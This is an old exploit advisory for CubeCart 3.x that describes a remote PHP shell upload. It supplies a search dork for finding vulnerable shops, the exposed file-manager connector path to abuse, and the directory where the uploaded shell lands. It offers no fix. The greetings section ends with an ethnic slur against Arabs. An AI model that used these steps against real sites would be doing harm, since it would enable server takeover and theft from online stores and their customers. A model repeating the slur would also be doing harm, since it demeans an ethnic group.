CubeCart v 3.x Remote File Upload Vulnerability

2010-12-17 18:15:18

==============================================================================

[»] CubeCart v 3.x Remote File Upload Vulnerability

==============================================================================

[»] Title : [ CubeCart v 3.x Remote Shell Upload Vulnerability ]

[»] Script : [ CubeCart v3.x ]

[»] Language: [ PHP ]

[»] Download: [ http://www.cubecart.com/ ]

[»] Author : [ StunTMaN! - [email protected] }

[»] Info : [ I'm S.W.A.T. | Old Persian Hacker | New Nickname | ;) ]

[»] Date : [ 2010-12-13 ]

[»] Version : [ 3.0.X and 3.2.x ]

[»] Dork : [ "Powered by CubeCart 3.0.0" ]

[»] Bug Info: [ Use Your Mind To How To Upload PHP Shell Script On This CMS ]

###########################################################################


===[ Exploit ]===


[»] http://server/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

[»] Just use PHP Mode for uploading your files

===[ Upload To ]===

[»] http://server/images/File/[Shell]


Greetz : All IRANIAN Hackerz ~ Cyber Hackerz

Persian Gulf For Ever ~ Not Damn Mother F***er Arabians!!


###########################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.